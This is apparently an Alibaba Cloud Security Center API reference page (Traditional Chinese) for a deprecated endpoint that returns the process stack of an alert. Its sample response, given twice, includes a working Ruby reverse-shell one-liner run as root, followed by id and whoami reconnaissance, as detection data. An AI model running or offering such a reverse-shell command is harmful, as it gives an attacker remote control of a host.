擷取異常警示事件的堆棧資訊。
目前該API介面已標記為棄用。
調試
您可以在OpenAPI Explorer中直接運行該介面,免去您計算簽名的困擾。運行成功後,OpenAPI Explorer可以自動產生SDK程式碼範例。
調試
授權資訊
|
操作 |
存取層級 |
資源類型 |
條件關鍵字 |
關聯操作 |
|
yundun-sas:DescribeAlarmEventStackInfo |
get |
*全部資源
|
無 | 無 |
請求參數
|
名稱 |
類型 |
必填 |
描述 |
樣本值 |
| SourceIp |
string |
否 |
訪問源的 IP 位址。 |
192.168.XX.XX |
| Lang |
string |
否 |
佈建要求和接收訊息的語言類型,預設為 zh。取值:
|
zh |
| Uuid |
string |
是 |
要查詢的資產的 UUID。 說明
調用 DescribeSuspEvents 介面擷取該參數。 |
18b7336e-d469-473b-af83-8e5420f9**** |
| EventName |
string |
是 |
事件名稱。 說明
詳細資料請參見 DescribeSuspEvents 介面擷取該參數。 |
Variable Trojan |
| UniqueInfo |
string |
是 |
警示事件的唯一標識。 |
1fbe8d16727f61d1478a674d6fa0**** |
| ResourceDirectoryAccountId |
integer |
否 |
資來源目錄成員帳號主帳號 ID。 說明
調用 DescribeMonitorAccounts 介面可以擷取該參數。 |
127608589417**** |
返回參數
|
名稱 |
類型 |
描述 |
樣本值 |
|
object |
|||
| StackInfo |
string |
警示詳情的堆棧資訊。 |
[ { "child": [ { "child": [ { "child": [ ], "data": { "cmdline": "id", "proc_path": "/bin/id", "pid": "[3033]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } }, { "child": [ ], "data": { "cmdline": "whoami", "proc_path": "/bin/whoami", "pid": "[3035]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "cmdline": "/bin/bash -c 'id && whoami'", "proc_path": "/bin/bash", "pid": "[3022]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "src_ip": "0.0.0.0", "cmdline": "ruby -rsocket -e exit if fork;c=TCPSocket.new(\"0.0.0.0\",\"1111\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", "file": "ruby", "login_port": "22", "login_type": "password", "proc_path": "/usr/bin/ruby", "dst_port": "1111", "pid": "3011", "user": "root", "dst_ip": "0.0.0.0", "log_time": "2020-01-20 09:00:00" }, "description": { "extend": [ { "content": "${tpl_netstat}", "content_type": "text" } ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ] |
| RequestId |
string |
阿里雲為該請求產生的唯一識別碼。 |
ECC6B3E3-D496-512D-B46D-E6996A6B63EE |
樣本
正常返回樣本
JSON格式
{
"StackInfo": "[\n {\n \"child\": [\n {\n \"child\": [\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"id\",\n \"proc_path\": \"/bin/id\",\n \"pid\": \"[3033]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n },\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"whoami\",\n \"proc_path\": \"/bin/whoami\",\n \"pid\": \"[3035]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"cmdline\": \"/bin/bash -c 'id && whoami'\",\n \"proc_path\": \"/bin/bash\",\n \"pid\": \"[3022]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"src_ip\": \"0.0.0.0\",\n \"cmdline\": \"ruby -rsocket -e exit if fork;c=TCPSocket.new(\\\"0.0.0.0\\\",\\\"1111\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\",\n \"file\": \"ruby\",\n \"login_port\": \"22\",\n \"login_type\": \"password\",\n \"proc_path\": \"/usr/bin/ruby\",\n \"dst_port\": \"1111\",\n \"pid\": \"3011\",\n \"user\": \"root\",\n \"dst_ip\": \"0.0.0.0\",\n \"log_time\": \"2020-01-20 09:00:00\"\n },\n \"description\": {\n \"extend\": [\n {\n \"content\": \"${tpl_netstat}\",\n \"content_type\": \"text\"\n }\n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n]",
"RequestId": "ECC6B3E3-D496-512D-B46D-E6996A6B63EE"
}
錯誤碼
|
HTTP status code |
錯誤碼 |
錯誤資訊 |
描述 |
|---|---|---|---|
| 400 | NoPermission | no permission | 無此服務的存取權限。 |
| 400 | RdCheckNoPermission | Resource directory account verification has no permission. | 資來源目錄帳號校正無許可權。 |
| 500 | RdCheckInnerError | Resource directory account service internal error. | 資來源目錄帳號服務內部錯誤。 |
| 500 | ServerError | ServerError | 服務故障,請稍後重試! |
| 403 | NoPermission | caller has no permission | 當前操作未被授權,請聯絡主帳號在RAM控制台進行授權後再執行操作。 |
訪問錯誤中心查看更多錯誤碼。
變更歷史
更多資訊,參考變更詳情。